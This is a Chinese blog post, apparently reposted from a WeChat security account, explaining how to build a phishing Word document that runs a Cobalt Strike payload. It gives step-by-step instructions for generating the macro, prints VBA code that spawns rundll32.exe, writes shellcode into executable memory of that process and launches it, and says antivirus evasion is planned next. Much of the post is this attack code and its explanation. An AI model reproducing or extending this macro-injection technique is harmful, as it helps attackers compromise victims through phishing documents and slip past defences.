简介
相信哥几个都有看到过一些文章写的宏病毒钓鱼上线然后干穿目标内网的文章,但是没看到别人是咋写的。因笔者才疏学浅,就分章节来分享一下宏病毒的一些研究,当然更新也会跟之前一样不稳定(又双叒叕开新坑了)。
制作宏文件
打开cs选择”Attacks—>Packages—>MS Office Macro"。
选择好ip点击”Generate“然后点击复制。
咱们打开一个docx文件,然后点击”开发工具“—>点击“Visual Basic”然后把内容复制到宏编辑器上。
代码分析
If Len(Environ("ProgramW6432")) > 0 ThensProc = Environ("windir") & "\SysWOW64\rundll32.exe"ElsesProc = Environ("windir") & "\System32\rundll32.exe"End Ifres = RunStuff(sNull, sProc, ByVal 0&, ByVal 0&, ByVal 1&, ByVal 4&, ByVal 0&, sNull, sInfo, pInfo)
这里是查找一下rundll32.exe这个文件的路径是否正确。RunStuff这个函数是创建一个进程。
rwxpage = AllocStuff(pInfo.hProcess, 0, UBound(myArray), &H1000, &H40)For offset = LBound(myArray) To UBound(myArray)myByte = myArray(offset)res = WriteStuff(pInfo.hProcess, rwxpage + offset, myByte, 1, ByVal 0&)Next offsetres = CreateStuff(pInfo.hProcess, 0, 0, rwxpage, 0, 0, 0)
WriteStuff这个函数会创建一个可读可写可执行的内存,然后读取shellcode放到创建的内存上执行shellcode。
运行文件
运行该文件后,有个很尴尬的地方,那就是打开后要求启用内容才能上线(而且wps还上不了线),点击启用内容后成功上线。
还有一个问题就是不免杀(最大的问题![钓鱼木马宏病毒研究(一)]()
),待我抽时间再研究一下吧一定不咕咕咕
总结
目前没研究明白有没有那种可以不用非得是docm文件上线的方法(我果然还是太菜了),等我再研究一下吧,到时候再顺便研整个免杀的。还望各位大佬给点时间研究。当然也欢迎各位大佬在评论区留言,沟通一下技术(或者我拉个群)
原文始发于微信公众号(FTC安全):钓鱼木马宏病毒研究(一)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论